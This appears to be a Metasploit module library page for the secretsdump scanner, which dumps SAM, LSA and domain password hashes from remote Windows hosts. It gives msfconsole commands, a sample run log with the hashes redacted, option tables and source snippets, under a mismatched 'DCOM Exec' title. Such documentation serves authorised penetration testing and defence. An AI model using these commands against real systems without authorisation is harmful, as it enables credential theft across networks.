DCOM Exec - Metasploit
This page contains detailed information about how to use the auxiliary/scanner/smb/impacket/secretsdump metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: DCOM Exec
Module: auxiliary/scanner/smb/impacket/secretsdump
Source code: modules/auxiliary/scanner/smb/impacket/secretsdump.py
Disclosure date: -
Last modification time: 2021-05-17 17:04:49 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module is also known as secretsdump.py.
Performs various techniques to dump hashes from the remote machine without executing any agent there. For SAM and LSA Secrets (including cached creds) we try to read as much as we can from the registry and then we save the hives in the target system (%SYSTEMROOT%\Temp dir) and read the rest of the data from there.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
This module is a scanner module, and is capable of testing against multiple hosts.
msf > use auxiliary/scanner/smb/impacket/secretsdump
msf auxiliary(secretsdump) > show options
... show and set options ...
msf auxiliary(secretsdump) > set RHOSTS ip-range
msf auxiliary(secretsdump) > exploit
Other examples of setting the RHOSTS option:
Example 1:
msf auxiliary(secretsdump) > set RHOSTS 192.168.1.3-192.168.1.200
Example 2:
msf auxiliary(secretsdump) > set RHOSTS 192.168.1.1/24
Example 3:
msf auxiliary(secretsdump) > set RHOSTS file:/tmp/ip_list.txt
Required Options
RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SMBPass: The password for the specified username
SMBUser: The username to authenticate as
Knowledge Base
Verification Steps
- Install Impacket v0.9.17 from GitHub. The
impacket
package must be in Python's module path, soimport impacket
works from any directory. - Install pycrypto v2.7 (the experimental release). Impacket requires this specific version.
- Start msfconsole
- Do:
use auxiliary/scanner/smb/impacket/secretsdump
- Set:
RHOSTS
,SMBUser
,SMBPass
- Do:
run
, see hashes from the remote machine
Scenarios
metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/secretsdump) > show options
Module options (auxiliary/scanner/smb/impacket/secretsdump):
Name Current Setting Required Description
---- --------------- -------- -----------
ExecMethod smbexec yes The method to use for execution (Accepted: smbexec, wmiexec, mmcexec)
OutputFile no Write the results to a file
RHOSTS 192.168.90.11 yes The target address range or CIDR identifier
SMBDomain . no The Windows domain to use for authentication
SMBPass wakawaka yes The password for the specified username
SMBUser spencer yes The username to authenticate as
THREADS 1 yes The number of concurrent threads
metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/secretsdump) > run
[*] [2018.04.04-17:15:45] Running for 192.168.90.11...
[*] [2018.04.04-17:15:45] 192.168.90.11 - Service RemoteRegistry is in stopped state
[*] [2018.04.04-17:15:45] 192.168.90.11 - Service RemoteRegistry is disabled, enabling it
[*] [2018.04.04-17:15:45] 192.168.90.11 - Starting service RemoteRegistry
[*] [2018.04.04-17:15:46] 192.168.90.11 - Retrieving class info for JD
[*] [2018.04.04-17:15:46] 192.168.90.11 - Retrieving class info for Skew1
[*] [2018.04.04-17:15:46] 192.168.90.11 - Retrieving class info for GBG
[*] [2018.04.04-17:15:46] 192.168.90.11 - Retrieving class info for Data
[REDACTED]
[*] [2018.04.04-17:15:48] 192.168.90.11 - Cleaning up...
[*] [2018.04.04-17:15:48] 192.168.90.11 - Stopping service RemoteRegistry
[*] [2018.04.04-17:15:48] 192.168.90.11 - Restoring the disabled state for service RemoteRegistry
[*] [2018.04.04-17:15:48] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Go back to menu.
Msfconsole Usage
Here is how the scanner/smb/impacket/secretsdump auxiliary module looks in the msfconsole:
msf6 > use auxiliary/scanner/smb/impacket/secretsdump
msf6 auxiliary(scanner/smb/impacket/secretsdump) > show info
Name: DCOM Exec
Module: auxiliary/scanner/smb/impacket/secretsdump
License: CORE Security License (Apache 1.1)
Rank: Normal
Provided by:
Alberto Solino
Spencer McIntyre
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ExecMethod smbexec yes The method to use for execution (Accepted: smbexec, wmiexec, mmcexec)
OutputFile no Write the results to a file
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SMBDomain . no The Windows domain to use for authentication
SMBPass yes The password for the specified username
SMBUser yes The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
Description:
Performs various techniques to dump hashes from the remote machine
without executing any agent there. For SAM and LSA Secrets
(including cached creds) we try to read as much as we can from the
registry and then we save the hives in the target system
(%SYSTEMROOT%\Temp dir) and read the rest of the data from there.
References:
https://github.com/gentilkiwi/kekeo/tree/master/dcsync
http://moyix.blogspot.com.ar/2008/02/syskey-and-sam.html
http://moyix.blogspot.com.ar/2008/02/decrypting-lsa-secrets.html
http://moyix.blogspot.com.ar/2008/02/cached-domain-credentials.html
http://www.quarkslab.com/en-blog+read+13
https://code.google.com/p/creddump/
http://lab.mediaservice.net/code/cachedump.rb
http://insecurety.net/?p=768
http://www.beginningtoseethelight.org/ntsecurity/index.htm
http://www.ntdsxtract.com/downloads/ActiveDirectoryOfflineHashDumpAndForensics.pdf
http://www.passcape.com/index.php?section=blog&cmd=details&id=15
https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py
Also known as:
secretsdump.py
Module Options
This is a complete list of options available in the scanner/smb/impacket/secretsdump auxiliary module:
msf6 auxiliary(scanner/smb/impacket/secretsdump) > show options
Module options (auxiliary/scanner/smb/impacket/secretsdump):
Name Current Setting Required Description
---- --------------- -------- -----------
ExecMethod smbexec yes The method to use for execution (Accepted: smbexec, wmiexec, mmcexec)
OutputFile no Write the results to a file
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SMBDomain . no The Windows domain to use for authentication
SMBPass yes The password for the specified username
SMBUser yes The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
Advanced Options
Here is a complete list of advanced options supported by the scanner/smb/impacket/secretsdump auxiliary module:
msf6 auxiliary(scanner/smb/impacket/secretsdump) > show advanced
Module advanced options (auxiliary/scanner/smb/impacket/secretsdump):
Name Current Setting Required Description
---- --------------- -------- -----------
ShowProgress true yes Display progress messages during a scan
ShowProgressPercent 10 yes The interval in percent that progress should be shown
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the scanner/smb/impacket/secretsdump module can do:
msf6 auxiliary(scanner/smb/impacket/secretsdump) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the scanner/smb/impacket/secretsdump auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(scanner/smb/impacket/secretsdump) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
- RemoteOperations failed: %s
- SAM hashes extraction failed: %s
- LSA hashes extraction failed: %s
- ERROR_DS_DRA_BAD_DN
- ERROR_DS_NAME_ERROR_NOT_UNIQUE
- You just got that error because there might be some duplicates of the same name.
- Module dependencies (impacket) missing, cannot continue
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
Here is a relevant code snippet related to the "Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user" error message:
148: self.__canProcessSAMLSA = False
149: if str(e).find('STATUS_USER_SESSION_DELETED') and os.getenv('KRB5CCNAME') is not None \
150: and self.__doKerberos is True:
151: # Giving some hints here when SPN target name validation is set to something different to Off
152: # This will prevent establishing SMB connections using TGS for SPNs different to cifs/
153: logging.error('Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user')
154: else:
155: logging.error('RemoteOperations failed: %s' % str(e))
156:
157: # If RemoteOperations succeeded, then we can extract SAM and LSA
158: if self.__justDC is False and self.__justDCNTLM is False and self.__canProcessSAMLSA:
RemoteOperations failed: %s
Here is a relevant code snippet related to the "RemoteOperations failed: %s" error message:
150: and self.__doKerberos is True:
151: # Giving some hints here when SPN target name validation is set to something different to Off
152: # This will prevent establishing SMB connections using TGS for SPNs different to cifs/
153: logging.error('Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user')
154: else:
155: logging.error('RemoteOperations failed: %s' % str(e))
156:
157: # If RemoteOperations succeeded, then we can extract SAM and LSA
158: if self.__justDC is False and self.__justDCNTLM is False and self.__canProcessSAMLSA:
159: try:
160: if self.__isRemote is True:
SAM hashes extraction failed: %s
Here is a relevant code snippet related to the "SAM hashes extraction failed: %s" error message:
165: self.__SAMHashes = SAMHashes(SAMFileName, bootKey, isRemote=self.__isRemote, perSecretCallback=self.perSecretCallback1)
166: self.__SAMHashes.dump()
167: if self.__outputFileName is not None:
168: self.__SAMHashes.export(self.__outputFileName)
169: except Exception as e:
170: logging.error('SAM hashes extraction failed: %s' % str(e))
171:
172: try:
173: if self.__isRemote is True:
174: SECURITYFileName = self.__remoteOps.saveSECURITY()
175: else:
LSA hashes extraction failed: %s
Here is a relevant code snippet related to the "LSA hashes extraction failed: %s" error message:
183: self.__LSASecrets.exportCached(self.__outputFileName)
184: self.__LSASecrets.dumpSecrets()
185: if self.__outputFileName is not None:
186: self.__LSASecrets.exportSecrets(self.__outputFileName)
187: except Exception as e:
188: logging.error('LSA hashes extraction failed: %s' % str(e), exc_info=True)
189:
190: # NTDS Extraction we can try regardless of RemoteOperations failing. It might still work
191: if self.__isRemote is True:
192: if self.__useVSSMethod and self.__remoteOps is not None:
193: NTDSFileName = self.__remoteOps.saveNTDS()
ERROR_DS_DRA_BAD_DN
Here is a relevant code snippet related to the "ERROR_DS_DRA_BAD_DN" error message:
203: outputFileName=self.__outputFileName, justUser=self.__justUser,
204: printUserStatus=self.__printUserStatus, perSecretCallback=self.perSecretCallback2)
205: try:
206: self.__NTDSHashes.dump()
207: except Exception as e:
208: if str(e).find('ERROR_DS_DRA_BAD_DN') >= 0:
209: # We don't store the resume file if this error happened, since this error is related to lack
210: # of enough privileges to access DRSUAPI.
211: resumeFile = self.__NTDSHashes.getResumeSessionFile()
212: if resumeFile is not None:
213: os.unlink(resumeFile)
ERROR_DS_NAME_ERROR_NOT_UNIQUE
Here is a relevant code snippet related to the "ERROR_DS_NAME_ERROR_NOT_UNIQUE" error message:
210: # of enough privileges to access DRSUAPI.
211: resumeFile = self.__NTDSHashes.getResumeSessionFile()
212: if resumeFile is not None:
213: os.unlink(resumeFile)
214: logging.error(e, exc_info=True)
215: if self.__justUser and str(e).find("ERROR_DS_NAME_ERROR_NOT_UNIQUE") >=0:
216: logging.info("You just got that error because there might be some duplicates of the same name. "
217: "Try specifying the domain name for the user as well. It is important to specify it "
218: "in the form of NetBIOS domain name/user (e.g. contoso/Administratror).")
219: elif self.__useVSSMethod is False:
220: logging.info('Something wen\'t wrong with the DRSUAPI approach. Try again with -use-vss parameter')
You just got that error because there might be some duplicates of the same name.
Here is a relevant code snippet related to the "You just got that error because there might be some duplicates of the same name." error message:
211: resumeFile = self.__NTDSHashes.getResumeSessionFile()
212: if resumeFile is not None:
213: os.unlink(resumeFile)
214: logging.error(e, exc_info=True)
215: if self.__justUser and str(e).find("ERROR_DS_NAME_ERROR_NOT_UNIQUE") >=0:
216: logging.info("You just got that error because there might be some duplicates of the same name. "
217: "Try specifying the domain name for the user as well. It is important to specify it "
218: "in the form of NetBIOS domain name/user (e.g. contoso/Administratror).")
219: elif self.__useVSSMethod is False:
220: logging.info('Something wen\'t wrong with the DRSUAPI approach. Try again with -use-vss parameter')
221: self.cleanup()
Module dependencies (impacket) missing, cannot continue
Here is a relevant code snippet related to the "Module dependencies (impacket) missing, cannot continue" error message:
244: self.__NTDSHashes.finish()
245:
246:
247: def run(args):
248: if dependencies_missing:
249: module.log('Module dependencies (impacket) missing, cannot continue', level='error')
250: return
251:
252: _msf_impacket.pre_run_hook(args)
253: dumper = DumpSecrets(args['rhost'], args['SMBUser'], args['SMBPass'], args['SMBDomain'], args['OutputFile'], args['ExecMethod'])
254: try:
Go back to menu.
Related Pull Requests
- #15212 Merged Pull Request: Converts Python shebangs over to Python 3
- #12524 Merged Pull Request: Convert all python code to python3. Fixes #12506.
- #10570 Merged Pull Request: AKA Metadata Refactor
- #10107 Merged Pull Request: Add the scanner/smb/impacket/secretsdump module
References
- CVE: Not available
- https://github.com/gentilkiwi/kekeo/tree/master/dcsync
- http://moyix.blogspot.com.ar/2008/02/syskey-and-sam.html
- http://moyix.blogspot.com.ar/2008/02/decrypting-lsa-secrets.html
- http://moyix.blogspot.com.ar/2008/02/cached-domain-credentials.html
- http://www.quarkslab.com/en-blog+read+13
- https://code.google.com/p/creddump/
- http://lab.mediaservice.net/code/cachedump.rb
- http://insecurety.net/?p=768
- http://www.beginningtoseethelight.org/ntsecurity/index.htm
- http://www.ntdsxtract.com/downloads/ActiveDirectoryOfflineHashDumpAndForensics.pdf
- http://www.passcape.com/index.php?section=blog&cmd=details&id=15
- https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py
See Also
Check also the following modules related to this module:
Authors
- Alberto Solino
- Spencer McIntyre
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.